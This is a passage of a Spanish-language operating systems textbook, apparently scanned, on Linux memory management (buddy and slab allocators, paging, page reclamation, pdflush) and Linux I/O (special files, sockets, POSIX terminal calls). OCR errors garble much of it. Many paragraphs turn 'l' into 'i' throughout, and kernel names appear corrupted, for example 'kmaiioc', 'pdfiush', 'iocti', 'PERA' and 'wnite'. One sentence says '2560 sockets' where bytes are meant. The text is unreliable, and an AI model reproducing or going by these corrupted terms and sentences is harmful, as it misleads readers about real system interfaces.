dirección virtual. La entrada que se encuentra aquí apunta a la página requerida. En el Pentium, que 
utiliza paginación de dos niveles, los directorios superior e intermedio de cada página sólo tienen 
una entrada, por lo que la entrada en el directorio global selecciona con efectividad la tabla de pá¬ 
ginas que se debe utilizar. De manera similar, se puede utilizar la paginación de tres niveles cuan¬ 
do sea necesario, para lo cual se establece el tamaño del campo de directorio de página superior en 
cero. 


Página 



Figura 10-16. Linux utiliza tablas de páginas de cuatro niveles. 

La memoria física se utiliza para varios fines. El kernel en sí está fijo en su totalidad: ninguna 
parte de él se pagina hacia fuera de la memoria. El resto de la memoria está disponible para las pá¬ 
ginas de usuario, la caché de paginación y otros fines. La caché de páginas guarda las páginas que 
contienen bloques de archivos que se leyeron recientemente, o que se leyeron por adelantado con 
la expectativa de utilizarlos en el futuro cercano, o guarda las páginas de bloques de archivos que 
se necesitan escribir en el disco, como los que se crearon mediante procesos en modo de usuario 
que se intercambiaron fuera de la memoria hacia el disco. Su tamaño es dinámico y compite por la 
misma reserva de páginas que los procesos de usuario. La caché de paginación en realidad no es 
una caché separada, sino sólo el conjunto de páginas de usuario que ya no son necesarias y están 
esperando a que el sistema las pagine hacia fuera de la memoria. Si una página en la caché de pá¬ 
ginas se reutiliza antes de sacarla de memoria, se puede reclamar con rapidez. 

Además, Linux acepta los módulos que se cargan en forma dinámica, que en su mayoría son 
drivers de dispositivos. Éstos pueden tener un tamaño arbitrario y a cada uno se le debe asignar una 
pieza contigua de memoria del kernel. Como consecuencia directa de estos requerimientos, Linux 
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administra ia memoria física de tai forma que pueda adquirir una pieza de memoria de un tamaño 
arbitrario cuando io desee. Ei aigoritmo que io utiiiza se conoce como aigoritmo de coiegas (buddy 
aigorithm), y io anaiizaremos a continuación. 

M ecanismos de asignación de memoria 

Linux proporciona varios mecanismos para asignar ia memoria. Ei mecanismo principai para asig¬ 
nar nuevos marcos de páginas de memoria física esei asignador de páginas, ei cuai opera median¬ 
te ei uso dei conocido aigoritmo de coiegas. 

La idea básica para administrar un trozo de ia memoria es ia siguiente. Ai principio, ia memo¬ 
ria cosiste en una soia pieza contigua, de 64 páginas en ei ejempio simpie de ia figura 10-17(a). 
Cuando iiega una petición de memoria, primero se redondea a una potencia de 2, por ejempio, ocho 
páginas. Después, ei trozo de memoria compieto se divide a ia mitad, como se muestra en (b). Co¬ 
mo cada una de estas piezas todavía es muy grande, ia pieza inferior se divide de nuevo a ia mitad 
(c) y se vueive a dividir (d). A hora tenemos un trozo dei tamaño correcto, por io que se asigna ai 
proceso que hizo ia iiamada, como se muestra sombreado en (d). 



Figura 10-17. Operación del algoritmo de colegas. 


A hora suponga que llega una segunda petición de ocho páginas. Ésta se puede satisfacer de ma¬ 
nera directa (e). En este punto llega una tercera petición de cuatro páginas. El trozo más pequeño 
disponible se divide (f) y se reclama la mitad del mismo (g). Después se libera el segundo de los 
trozos de 8 páginas (h). Por último, se libera el otro trozo de ocho páginas. Como los dos trozos de 
ocho pági ñas adyacentes que se acaban de I iberar provienen del mismo trozo de 16 páginas, se com¬ 
binan para obtener devuelta el trozo de 16 páginas (i). 

Linux utiliza el algoritmo de colegas para administrar la memoria, con la característica adicio¬ 
nal de que tiene un arreglo en el que el primer elemento es la cabeza de una lista de bloques de una 
unidad de tamaño 1, el segundo elemento es la cabeza de una lista de bloques de unidades de tama¬ 
ño 2, el siguiente elemento apunta a los bloques de 4 unidades, y así en lo sucesivo. De esta forma 
se puede encontrar con rapidez un bloque de cualquier potencia de 2. 

Este algoritmo produce una fragmentación interna considerable, ya que si se desea un trozo de 
65 páginas, hay que pedirlo y se obtiene un trozo de 128 páginas. 
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Para solucionar este problema, Linux tiene un segundo mecanismo para asignar la memoria: el 
asignador de losas (slab allocator), que toma los trozos mediante el uso del algoritmo de colegas 
pero después crea losas (unidades más pequeñas) a partir de ellos, y administra estas unidades más 
pequeñas por separado. 

Como el kernel crea y destruye con frecuencia objetos de cierto tipo (por ejemplo, task_struct), 
se basa en lo que se conoce como cachés de objetos. Estas cachés consisten en apuntadores a una 
o más losas que pueden almacenar vari os objetos del mismo tipo. Cada una de estas losas puede es¬ 
tar llena, parcialmente llena o vacía. 

Por ejemplo, cuando el kernel necesita asignar un nuevo descriptor de proceso, es decir, una nue¬ 
va task_struct, busca estructuras de tarea en la caché de objetos y primero trata de encontrar una lo¬ 
sa parcialmente llena y asignarle un nuevo objeto task_struct. Si no hay una disponible, busca en la 
lista de losas vacías. Por último, si es necesario asigna una nueva losa, coloca ahí la nueva estructu¬ 
ra de tarea y la enlaza con la caché de objetos estructura de tarea. De hecho, el servicio del kernel 
kmaiioc, que asigna regiones de memoria contigua física en el espacio de direcciones del kernel, se 
construye encima de la interfaz de losa y caché de objetos aquí descrita. 

También hay un tercer asignador de memoria disponible, conocido como vmaiioc, y se utiliza 
cuando la memoria solicitada sólo necesita estar contigua en el espacio virtual, pero no en la me¬ 
moria física. En la práctica esto se aplica a la mayoría de la memoria que se solicita. Una excepción 
son los dispositivos, que viven al otro extremo del bus de memoria y de la unidad de administra¬ 
ción de memoria, y por lo tanto no entienden las direcciones virtuales. Sin embargo, el uso de vma- 
iioc produce una degradación en el rendimiento, por lo que se utiliza principalmente para asignar 
grandes cantidades de espacio de direcciones virtuales contiguas, como para insertar módulos del 
kernel en forma dinámica. Todos estos asignadores de memoria se derivan de los que se utilizan en 
System V. 


Representación del espacio de direcciones virtuales 

El espacio de direcciones virtuales se divide en áreas o regiones homogéneas, contiguas y alinea¬ 
das por páginas. Es decir, cada área consiste en una serie de páginas consecutivas con las mismas 
propiedades de protección y paginación. El segmento de texto y los archivos asignados son ejem¬ 
plos de áreas (vea la figura 10-15). Puede haber hoyos en el espacio de direcciones virtuales entre 
las áreas. Cualquier referencia de memoria a un hoyo produce un fallo de página fatal. El tamaño 
de página es fijo; por ejemplo, 4 KB para el Pentium y 8 KB para el Alpha. Empezando con el Pen¬ 
tium, que acepta marcos de página de 4 M B, Linux puede aceptar marcos de página jumbo de4 M B 
cada uno. Además, en un modo PAE (Physical Address Extensión, Extensión de Dirección Física) 
que se utiliza en ciertas arquitecturas de 32 bits para incrementar el espacio de direcciones del pro¬ 
ceso más allá de 4 GB, se admiten tamaños de página de 2 M B. 

Cada área se describe en el kernel mediante una entrada vm_area_struct. Todas las entradas 
vm_area_struct para un proceso se enlazan entre sí en una lista ordenada por dirección virtual, de 
manera que se puedan encontrar todas las páginas. Cuando la lista se hace muy grande (más 
de 32 entradas), se crea un árbol para agilizar la búsqueda. La entrada vm_area_struct lista las pro¬ 
piedades del área. Estas propiedades incluyen el modo de protección (por ejemplo, sólo lectura o 
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lectura/escritura), si está fijada en ia memoria (no se puede paginar), y en qué dirección aumenta su 
tamaño (hacia arriba para ios segmentos de datos, hacia abajo para ias piias). 

La entrada vm_area_struct también registra si ei área es privada para ei proceso, o si ia com¬ 
parte con uno o más procesos. Después de una iiamada a fork, Linux crea una copia de ia iista de 
áreas para ei proceso hijo, pero estabiece ei hijo y ei padre de manera que apunten a ias mismas ta- 
bias de páginas. Las áreas se marcan como de iectura/escritura, pero ias páginas se marcan como 
de sóio iectura. Si aigún proceso trata de escribir en una página, se produce un faiio de protección 
y ei kernei ve que se puede escribir de manera iógica en ei área, pero en ia página no, por io cuai 
otorga ai proceso una copia de ia página y ia hace de iectura/escritura. Este mecanismo es ia forma 
en que se impiementa ia copia ai escribir. 

La entrada vm_area_struct también registra si ei área tiene asignado un aimacenamiento de res- 
paido en ei disco, y de ser así, cuái es su ubicación. Los segmentos de texto utiiizan ei archivo bi¬ 
nario ejecutabie como aimacenamiento de respaido, y ios archivos con asignación de memoria 
utiiizan ei archivo en ei disco como aimacenamiento de respaido. Otras áreas como ia piia no tie¬ 
nen asignado aimacenamiento de respaido sino hasta que haya que paginadas fuera de ia memoria. 

Hay un descriptor de memoria de nivei superior conocido como mm_struct, ei cuai recopiia 
información sobre todas ias áreas de memoria virtuai que pertenecen a un espacio de direcciones, in¬ 
formación sobre ios distintos segmentos (texto, datos, piia), sobre ios usuarios que comparten este 
espacio de direcciones, etcétera. Se puede acceder a todos ios eiementos vm_area_struct de un es¬ 
pacio de direcciones por medio de su descriptor de memoria de dos formas. En ei primer método, 
se organizan en iistas eniazadas ordenadas por direcciones de memoria virtuai. Este método es útii 
cuando se requiere ei acceso a todas ias áreas de memoria virtuai, o cuando ei kernei busca asignar 
una región de memoria virtuai de un tamaño específico. Además, ias entradas vm_area_struct se or¬ 
ganizan en un árboi binario tipo "rojo-negro", una estructura de datos optimizada para búsquedas 
rápidas. Este método se utiiiza cuando hay que acceder a una memoria virtuai específica. A i permi¬ 
tir ei acceso a ios eiementos dei espacio de direcciones dei proceso por medio de estos dos méto¬ 
dos, Linux utiiiza más estado por proceso, pero permite que ias distintas operaciones dei kernei 
utiiicen ei método de acceso más eficiente para ia tarea que se vaya a reaiizar. 

10.4.4 La paginación en Linux 

Los primeros sistemas UNIX dependían de un proceso intercambiador (swapper process) para 
desplazar procesos completos entre la memoria y el disco, cuando no todos los procesos activos po¬ 
dían caber en la memoria física. AI igual que las otras versiones modernas de U NIX, L inux ya no 
desplaza procesos completos. La unidad de administración de la memoria principal es una página, 
y casi todos los componentes de administración de memoria operan a nivel de página. El subsiste¬ 
ma de intercambio también opera a nivel de página y está muy acoplado con el Algoritmo de re¬ 
clamación de marcos de página, que analizaremos más adelante en esta sección. 

La idea básica detrás de la paginación en Linux es simple: un proceso no necesita estar com¬ 
pletamente en la memoria para ejecutarse. Todo lo que en realidad se requiere es la estructura de 
usuario y las tablas de páginas. Si estos elementos se intercambian hacia la memoria, se considera 
que el proceso está "en la memoria" y se puede programar su ejecución. Las páginas de los segmen¬ 
tos de texto, datos y pila se llevan a la memoria en forma dinámica, uno a la vez, a medida que se 
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hace referencia a ellos. Si la estructura de usuario y la tabla de páginas no están en memoria, el pro¬ 
ceso no se puede ejecutar sino hasta que el intercambiador los lleve a la memoria. 

Una parte de la paginación se implementa mediante el kernel, y la otra parte mediante un nue¬ 
vo proceso conocido como demonio de paginación. Este demonio es el proceso 2 (el proceso 0 es 
el proceso inactivo, al cual tradicional mente se le conoce como intercambiador, y el proceso 1 
es init, como se muestra en la figura 10-11). AI igual que todos los demonios, el demonio de pagina¬ 
ción se ejecuta en forma periódica. U na vez despierto, busca en los alrededores para ver si hay traba¬ 
jo por hacer. Si ve que el número de páginas en la lista de páginas de memoria libres es demasiado 
bajo empieza a liberar más páginas. 

Linux es un sistema de paginación bajo demanda, sin paginación previa ni un concepto de conjun¬ 
to de trabajo (aunque hay una llamada al sistema en la que un usuario puede sugerir que tal vez se re¬ 
quiera pronto cierta página, esperando que esté ahí cuando se necesite). Los segmentos de texto y los 
archivos asignados se paginan a sus respectivos archivos en el disco. Todo lo demás se pagina a la par¬ 
tición de paginación (si está presente), o a uno de los archivos de paginación de longitud fija, conoci¬ 
do como área de intercambio. Los archivos de paginación se pueden agregar y eliminar en forma 
dinámica, y cada uno tiene una prioridad. La paginación a una partición separada, a la cual se accede 
como dispositivo puro, es más eficiente que la paginación a un archivo por varias razones. En primer 
lugar, la asignación entre los bloques de archivo y los bloques de disco no es necesaria (ahorra opera¬ 
ciones de E/S de disco para leer bloques indirectos). En segundo lugar, las escrituras físicas pueden ser 
de cualquier tamaño, no sólo del tamaño del bloque de archivo. En tercer lugar, una página siempre se 
escribe en forma contigua al disco; con un archivo de paginación, puede que se haga esto o no. 

Las páginas no se asignan en el dispositivo o partición de paginación sino hasta que se necesi¬ 
ten. Cada dispositivo y archivo inicia con un mapa de bits que le indica cuáles páginas están libres. 
Cuando se saca de la memoria una página sin almacenamiento de respaldo, se selecciona la parti¬ 
ción o archivo de paginación de mayor prioridad que aún tenga espacio y se le asigna una página. 
Por lo general, si la partición de paginación está presente tiene una mayor prioridad que cualquier 
archivo de paginación. La tabla de páginas se actualiza para reflejar que la página ya no está pre¬ 
sente en la memoria (por ejemplo, se activa el bit de página no presente) y se escribe la ubicación 
del disco en la entrada de tablas de páginas. 

EI algoritmo de reemplazo de página 

El reemplazo de páginas funciona de la siguiente manera. Linux trata de mantener ciertas páginas 
libres, de manera que se puedan reclamar según sea necesario. Desde luego que esta reserva debe 
reponerse en forma continua. El PERA (Page F rame Recia i mi ng Algorithm, Algoritmo de reclama¬ 
ción de marcos de página) se utiliza para este trabajo. 

Primero que nada, Linux hace la distinción entre cuatro tipos distintos de páginas: no reclama- 
ble, intercambiable, sincronizable y descartable. Las páginas no reclamables, como las páginas re¬ 
servadas o bloqueadas, las pilas en modo de kernel y páginas similares, no se pueden paginar fuera 
de la memoria. Las páginas intercambiables se deben escribir de vuelta en el área de intercambio o 
la partición de disco de paginación para poder reclamar la página. Las páginas sincronizadles se de¬ 
ben escribir devuelta en el disco si se marcaron como sucias. Por último, las páginas descartadles 
se pueden reclamar de inmediato. 
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En tiempo de inicio, init inicia un demonio de paginación (kswapd) para cada nodo de memo¬ 
ria, y ios configura para que se ejecuten en forma periódica. Cada vez que se despierta kswapd com¬ 
prueba si hay suficientes páginas iibres disponibies, para io cuai compara ias marcas de agua 
inferior y superior con ei uso de memoria actuai para cada zona de memoria. Si hay suficiente me¬ 
moria regresa ai estado inactivo, aunque se puede despertar antes si de repente se requieren más pá¬ 
ginas. Si ia memoria disponibie para cuaiquiera de ias zonas se reduce por debajo de un umbrai, 
kswapd inicia ei aigoritmo de reciamación de marcos de página. Durante cada ejecución sóio se 
reciama cierto número de páginas como objetivo, por io generai 32. Este número seiimita para con- 
troiar ia presión de E/S (ei número de escrituras de disco que se crearon durante ias operaciones dei 
PERA). Tanto ei número de páginas reciamadas como ei número totai de páginas expioradas son 
parámetros que se pueden configurar. 

Cada vez que se ejecuta ei PERA, primero trata de reciamar ias páginas sencidas y después in¬ 
tenta con ias más difíciies. Las páginas descartabies y no referenciadas se pueden reciamar de 
inmediato, ai despiazariasa ia iista de páginas iibres de ia zona. Después busca ias páginas con aima- 
cenamiento de respaido que no se hayan referenciado recientemente, mediante ei uso de un aigorit¬ 
mo parecido ai reioj. Luego se buscan ias páginas compartidas que ninguno de ios usuarios parezca 
haber utiiizado mucho. Ei desafío con respecto a ias páginas compartidas es que, si se reciama ia 
entrada de una página, se deben actuaiizar en forma síncrona ias tabias de páginas de todos ios es¬ 
pacios de direcciones que compartían originaimente esa página. Linux mantiene estructuras de da¬ 
tos eficientes tipo árboi para encontrar fáciimente a todos ios usuarios de una página compartida. A 
continuación se buscan ias páginas de usuario ordinarias, y si se van a sacar de ia memoria, se de¬ 
be programar su escritura en ei área de intercambio. L a capacidad de intercambio dei sistema (es 
decir, ia proporción de páginas con aimacenamiento de respaido comparadas con ias páginas que 
necesitan intercambiarse y que se seieccionaron durante ei ERRA) es un parámetro dei aigoritmo 
que se puede ajustar. Por úitimo, si una página es inváiida, no está en ia memoria, está compartida, 
bioqueada en ia memoria, o se está usando para DMA, se omite. 

Ei PERA utiiiza un aigoritmo tipo reioj para seieccionar ias páginas antiguas que se van a sa¬ 
car de ia memoria dentro de cierta categoría. En ei núcieo de este aigoritmo hay un cicio que ex- 
piora ias iistas de páginas activas e inactivas de cada zona, tratando de reciamar distintos tipos de 
páginas, con distintas urgencias. Ei vaior de urgencia se pasa como parámetro para indicar ai pro¬ 
cedimiento cuánto esfuerzo debe empiear para reciamar ciertas páginas. Por io generai, esto signi¬ 
fica cuántas páginas debe inspeccionar antes de rendirse. 

Durante ei PERA, ias páginas se despiezan entre ias iistas de páginas activas e inactivas, en ia 
forma descrita en ia figura 10-18. Para mantener cierta heurística y tratar de encontrar páginas a ias 
que no se haya hecho referencia y que sea improbabie que se requieran en ei futuro cercano, ei 
PERA mantiene dos banderas por página: activa/inactiva, y referenciada/no referenciada. Estas dos 
banderas codifican cuatro estados, como se muestra en ia figura 10-18. Durante ia primera expiora- 
ción de un conjunto de páginas, ei PERA primero borra sus bits de referencia. Si durante ia segunda 
expioración deia página se determina que se hizo referencia a eiia, se avanza a otro estado, desde ei 
cuai es menos probabieque ia reciamen. En caso contrario, ia página se mueve a un estado en ei que 
es más probabie que ia saquen de memoria. 

Las páginas que estén en ia iista de inactivas y a ias que no se haya hecho referencia desde ia 
úitima vez que se inspeccionaron, son ias mejores candidatos para sacar de ia memoria. Son pági- 
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ñas en las que PG_active y PG_referenced están en cero en la figura 10-18. No obstante, si es ne¬ 
cesario ias páginas se pueden reciamar inciuso aunque se encuentren en aiguno de ios otros esta¬ 
dos. Las fiechas reiienar en ia figura 10-18 iiustran este hecho. 


Inactivas Activas 



Figura 10-18. Estados de página considerados en el algoritmo de reemplazo 
de marcos de página. 

La razón por ia queei PERA mantiene páginas en ia iista de inactivas aunque se pudiera haber he¬ 
cho referencia a eiias es para evitar situaciones como ia siguiente. Considere un proceso que accede en 
forma periódica a distintas páginas, con un periodo de 1 hora. Una página a ia que se haya accedido 
desde ei úitimo cicio tendrá activada su bandera de referencia. Sin embargo, como no se necesitará de 
nuevo durante ia siguiente hora, no hay razón para considerada como candidato para ia reciamación. 

U n aspecto dei sistema de administración de memoria que no hemos mencionado aún es un se¬ 
gundo demonio iiamado pdfiush, que en reaiidad es un conjunto de hiios de demonios en segundo 
piano. Los hiios pdfiush (1) despiertan en forma periódica (por io generai cada 500 mseg) para es¬ 
cribir de vueita en ei disco ias páginas sucias muy antiguas, o (2) despiertan de manera expiícita 
mediante ei kernei cuando ios niveies de memoria disponibie están por debajo de cierto umbrai, pa¬ 
ra escribir de vueita ias páginas sucias de ia caché de páginas ai disco. En modo de laptop, para 
poder conservar ia vida de ias baterías, ias páginas sucias se escriben en ei disco cada vez que ios 
hiios pdfiush se despiertan. Las páginas sucias también se pueden escribir en ei disco mediante pe¬ 
ticiones expiícitas de sincronización, a través de iiamadas ai sistema como sync, orfsync, fda- 
tasync. Las versiones anteriores de L inux utiiizaban dos demonios separados: kupdate para escribir 
de vueita ias páginas antiguas, y bdfiush para escribir de vueita ias páginas bajo condiciones de po¬ 
ca memoria. En ei kernei 2.4, esa funcionaiidad se integró en ios hiios pdfiush. Se eiigieron hiios 
múitipies para ocuitar ias extensas iatencias dei disco. 


10.5 ENTRADA/SALIDA EN LINUX 

Ei sistema de E/S en Linux es bastante simpie y simiiar a ias otras versiones de UNIX. Esencial¬ 
mente, todos los dispositivos de E/S se deben ver como archivos y se deben utilizar con las mismas 
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llamadas al sistema read y write que se utilizan para acceder a todos los archivos ordinarios. En al¬ 
gunos casos es necesario establecer parámetros de dispositivos, para lo cual se usa una llamada 
al sistema especial. En las siguientes secciones analizaremos estas cuestiones. 

10.5.1 Conceptos fundamentales 

Al igual que todas las computadoras, las que ejecutan Linux tienen dispositivos de E/S como dis¬ 
cos, impresoras y redes conectados a ellas. Se requiere alguna forma de permitir que los programas 
accedan a esos dispositivos. Aunque hay varias soluciones posibles, la que utiliza Linux es integrar 
los dispositivos en el sistema de archivos, como lo que se conoce por archivos especiales. A cada 
dispositivo de E/S se le asigna un nombre de ruta, por lo general en /dev. Por ejemplo, un disco po¬ 
dría ser/dev/hdl, una impresora podría ser/dev/lp y la red podría ser/dev/net. 

Estos archivos especiales se pueden utilizar de la misma forma que cualquier otro archivo. No 
se requieren comandos o llamadas al sistema especiales. Basta con utilizar las llamadas al sistema 
usuales como open, read y write. Por ejemplo, el comando 

cp archivo /dev/lp 

copia el archivo a la impresora, lo cual hace que se imprima (suponiendo que el usuario tiene per¬ 
miso de acceder a/dev/lp). Los programas pueden abrir, leer y escribir en ciertos archivos especia¬ 
les de la misma forma que con los archivos regulares. De hecho, cp en el ejemplo anterior ni 
siquiera sabe que está imprimiendo. De esta forma no se requiere ningún mecanismo especial para 
realizar operaciones de E/S. 

Los archivos especiales se dividen en dos categorías: de bloques y de caracteres. Un archivo 
especial de bloques consiste en una secuencia de bloques enumerados. La propiedad clave del ar¬ 
chivo especial de bloques es que se puede direccionar y utilizar cada bloque por separado. En otras 
palabras, un programa puede abrir un archivo especial de bloques y leer, por ejemplo, el bloque 124 
sin tener que leer primero los bloques 0 a 123. Por lo general, los archivos especiales de bloques se 
utilizan para los discos. 

Los archivos especiales de caracteres se utilizan por lo común para dispositivos que reciben 
o envían un flujo de caracteres. Los teclados, las impresoras, redes, ratones, plotters y la mayoría 
de los otros dispositivos de E/S que aceptan o producen datos para las personas, utilizan archivos 
especiales de caracteres. No es posible (ni tiene sentido) buscar el bloque 124 en un ratón. 

A cada archivo especial se le asocia un driver de dispositivo que se encarga de manejar el dis¬ 
positivo correspondiente. Cada driver tiene lo que se conoce como número de dispositivo mayor, 
que sirve para identificarlo. Si un driver acepta varios dispositivos (por ejemplo, dos discos del mis¬ 
mo tipo), cada disco tiene un número de dispositivo menor que lo identifica. En conjunto, los nú¬ 
meros de dispositivo mayor y menor especifican cada uno de los dispositivos de E/S en forma 
única. En unos cuantos casos, un solo driver maneja dos dispositivos que están muy relacionados. 
Por ejemplo, el driver que corresponde a /dev/tty controla tanto el teclado como la pantalla, que a 
menudo se considera como un solo dispositivo: la terminal. 

Aunque no se puede acceder en forma aleatoria a la mayoría de los archivos especiales de ca¬ 
racteres, a menudo se requiere controlarlos en formas que no se requieren con los archivos especia¬ 
les de bloques. Por ejemplo, considere la entrada que se escribe en el teclado y se muestra en la 
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pantalla. Cuando un usuario comete un error de teclado y desea borrar el último carácter que escri¬ 
bió, oprime cierta tecla. Algunas personas prefieren usar la tecla de retroceso, y otros prefieren 
SU PR. De manera similar, para borrar toda la línea que se acaba de escribir hay muchas convencio¬ 
nes. Por tradición seutilizaba (g), pero antela popularidad del correo electrónico (que utiliza @ den¬ 
tro de las direcciones) muchos sistemas han adoptado CTRL-U o algún otro carácter. De igual forma, 
para interrumpir el programa en ejecución hay que oprimir cierta tecla especial. Aquí también hay 
distintas personas con distintas preferencias. CTRL-C es una opción común, pero no es universal. 

En vez de seleccionar una opción y obligar a que todos la utilicen, Linux permite al usuario 
personal izar todas estas funciones y muchas otras. Por lo general se proporciona una llamada al sis¬ 
tema especial para establecer estas opciones. Esta llamada al sistema también permite expandir el 
tabulador, habilitar y deshabilitar el eco de los caracteres, realizar la conversión entre el retorno de 
carro y el avance de página, y otras cosas similares. Esta llamada al sistema no se permite en los ar¬ 
chivos regulares o en los archivos especiales de bloque. 

10.5.2 Redes 

Las redes son otro ejemplo de E/S, siendo Berkeley UNIX el primero en promover su uso, y des¬ 
pués Linux siguió su convención más o menos al pie de la letra. El concepto clave en el diseño de 
Berkeley es el socket. Los sockets son análogos a las bandejas de correo y los conectares de pared 
para los teléfonos, ya que actúan como interfaz entre los usuarios y la red, de igual forma que las 
bandejas de correo actúan como interfaz entre las personas y el sistema postal, y los conectares de 
pared de teléfono les permiten enchufar teléfonos y conectarse al sistema telefónico. La posición 
de los sockets se muestra en la figura 10-19. 


Proceso emisor 


Proceso receptor 



usuario 


kernel 


Red 


Figura 10-19. Los usos de los sockets en las redes. 

Los sockets se pueden crear y destruir en forma dinámica. Al crear un socket se devuelve un 
descriptor de archivo, el cual se requiere para establecer una conexión, leer datos, escribir datos y 
liberar la conexión. 

Cada socket admite un tipo particular de red, el cual se especifica al momento de crear el soc¬ 
ket. Los tipos más comunes son: 
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1. Flujo de bytes confiable orientado a conexión. 

2. Flujo de paquetes confiable orientado a conexión. 

3. Transmisión de paquetes desconfiable. 

El primer tipo de Socket permite que dos procesos en distintas máquinas establezcan el equivalen¬ 
te a una canalización ente ellos. Los bytes se meten en un extremo y salen en el mismo orden por 
el otro extremo. El sistema garantiza que lleguen todos los bytes enviados, y en el mismo orden en el 
que se enviaron. 

El segundo tipo es similar al primero, excepto que preserva los límites de los paquetes. Si el 
emisor realiza cinco llamadas separadas a wnite, cada una de 512 bytes, y el receptor pide 2560 by¬ 
tes, con un Socket de tipo 1 se devolverán los 2560 sockets al mismo tiempo. Con un socket de ti¬ 
po 2, sólo se devolverán 512 bytes. Se requieren cuatro llamadas más para obtener el resto. El tercer 
tipo de Socket se utiliza para dar acceso al usuario a la red cruda. Este tipo es especialmente útil pa¬ 
ra las aplicaciones en tiempo real, y para las situaciones en las que el usuario desea implementar un 
esquema de manejo de errores especializado. La red puede perder los paquetes o cambiar su orden. 
No hay garantías, como en los primeros dos casos. La ventaja de este modo es que hay un mayor 
rendimiento, lo cual algunas veces es más importante que la confiabilidad (por ejemplo, para la en¬ 
trega de contenido multimedia, donde es más importante la velocidad que la integridad). 

Cuando se crea un socket, uno de los parámetros especifica el protocolo que se va a utili¬ 
zar. Para los flujos de bytes confiables, el protocolo más popular es TCP (Transmission Control 
Protocol, Protocolo de control de transmisión). Para la transmisión no confiable orientada a pa¬ 
quetes, la opción común es UDP (User Datagram Protocol, Protocolo de datagramas de usuario). 
Ambos protocolos están en un nivel por encima de IP (Internet Protocol, Protocolo Internet). To¬ 
dos estos protocolos se originaron con la red ARPANET del Departamento de Defensa de los 
EE.UU., y ahora forman la base de Internet. No hay un protocolo común para los flujos de paque¬ 
tes confiables. 

Antes de poder usar un socket para trabajaren la red, hay que enlazarlo con una dirección. És¬ 
ta puede estar en uno de varios dominios de nombramiento. El dominio más común es el dominio 
de nombramiento de Internet, que utiliza enteros de 32 bits para nombrar los puntos extremos en la 
versión 4, y enteros de 128 bits en la versión 6 (la versión 5 fue un sistema experimental que nun¬ 
ca llegó a las ligas mayores). 

Una vez que se crean los sockets en las computadoras de origen y de destino, se puede estable¬ 
cer una conexión entre ellas (para la comunicación orientada a conexión). U na de las partes realiza 
una llamada al sistema listen en un socket local, con lo cual se crea un búfer y se bloquea hasta 
que lleguen datos. La otra parte realiza una llamada al sistema connect y proporciona como pará¬ 
metros el descriptor de archivo para un socket local y la dirección de un socket remoto. Si la parte 
remota acepta la llamada, entonces el sistema establece una conexión entre los sockets. 

U na vez establecida la conexión, funciona de manera análoga a una tubería. U n proceso puede 
leer y escribir datos de ella mediante el uso del descriptor de archivo para su socket local. Cuando 
ya no se requiere la conexión se puede cerrar en la forma usual, a través de la llamada al sistema 

Glose. 
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10.5.3 L lamadas al sistema de E ntrada/Salida en L inux 

Por lo general, cada dispositivo de E/S en un sistema Linux tiene asociado un archivo especiai. La 
mayoría de ias operaciones de E/S se pueden reaiizar con sóio usar ei archivo apropiado, eiiminan- 
do la necesidad de iiamadasespeciaiesai sistema. Sin embargo, aiguna vez se ti ene ia necesidad de 
aigo que sea específico para un dispositivo. Antes de POSIX, ia mayoría de ios sistemas UNIX te¬ 
nían una llamada al sistema iocti que realizaba una gran variedad de acciones específicas para un 
dispositivo en archivos especiales. A través de los años, esto ha resultado ser un desastre. POSIX lo 
solucionó al dividir sus funciones en llamadas a funciones separadas, principalmente para los dis¬ 
positivos de terminal. En Linux y en los sistemas UNIX modernos, depende de la implementación 
si cada una de estas acciones es una llamada al sistema separada, o si comparten una sola llamada 
al sistema, o cualquier otra forma de hacerlo. 

Las primeras cuatro llamadas que se listan en la figura 10-20 se utilizan para establecer y obte¬ 
ner la velocidad de la terminal. Se proporcionan distintas llamadas para la entrada y la salida debido 
a que algunos módems operan a una velocidad dividida. Por ejemplo, los antiguos sistemas videotex 
permitían a las personas el acceso a bases de datos públicas con peticiones cortas de su hogar al ser¬ 
vidor a 75 bits/seg, y las peticiones regresaban a 1200 bits/seg. Este estándar se adoptó en una épo¬ 
ca en la que era demasiado costoso tener 1200 bits/seg para usar la conexión desde el hogar. Los 
tiempos cambian en el mundo de las redes. Esta asimetría aún persiste en algunas compañías telefó¬ 
nicas, que ofrecen servicio de recepción a 8 M bps servicio de envío a 512 kbps, a menudo bajo el 
nombre de ADSL (Asymmetric Digital Suscriber Line, Línea de suscriptor digital asimétrica). 


Llamada a función 

Descripción 

s = cfsetospeed(&term¡os, velocidad) 

Establece la velocidad de salida 

s = cfsetispeed(&termios, velocidad) 

Establece la velocidad de entrada 

s = cfgetospeed(&termios, velocidad) 

Obtiene la velocidad de salida 

s = cfgtetispeed(&termios, velocidad) 

Obtiene la velocidad de entrada 

s = tcsetattr{fd, opc, Stermios) 

Establece los atributos 

s = tcgetattr(fd, Stermios) 

Obtiene los atributos 


Figura 10-20. Las principales llamadas de POSIX para administrar 
la terminal. 

Las últimas dos llamadas en la lista son para establecer y leer devuelta todos los caracteres es¬ 
peciales que se utilizan para borrar caracteres y líneas, interrumpir procesos, etcétera. Además, ha¬ 
bilitan y deshabilitan el eco, manejan el flujo de control y otras funciones relacionadas. También 
existen llamadas a funciones de E/S adicionales, pero son algo especializadas, por lo que no las ana¬ 
lizaremos aquí. Además, aún está disponible iocti. 

10.5.4 I mplementación de la entrada/salida en L inux 

La E/S en Linux se implementa mediante una colección de drivers de dispositivos, uno por cada ti¬ 
po de dispositivo. La función de los drivers es aislar el resto del sistema de las idiosincrasias del 
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hardware. AI proveer interfaces estándar entre los drivers y el resto del sistema operativo, la mayor 
parte del sistema de E/S se puede colocar en la parte del kernel independiente de la máquina. 

Cuando el usuario accede a un archivo especial, el sistema de archivos determina los números 
de dispositivo mayor y menor que le pertenecen, y si es un archivo especial de bloques o un archi¬ 
vo especial de caracteres. El número de dispositivo mayor se utiliza para indexar en una de dos ta¬ 
blas de hash internas que contienen estructuras de datos para dispositivos de caracteres o de 
bloques. La estructura que se localiza de esta forma contiene apuntadores a los procedimientos a 
llamar para abrir el dispositivo, leer del dispositivo, escribir en el dispositivo, etcétera. El número 
de dispositivo menor se pasa como parámetro. Agregar un nuevo tipo de dispositivo en Linux sig¬ 
nifica agrega una nueva entrada a una de esas tablas y suministrar los procedimientos correspon¬ 
dientes para manejar las diversas operaciones en el dispositivo. 

En la figura 10-21 se muestran algunas de las operaciones que se pueden asociar con distintos 
dispositivos de caracteres. Cada fila se refiere a un solo dispositivo de E/S (es decir, un solo driver). 
Las columnas representan las funciones que deben aceptar todos los drivers de caracteres. Existen 
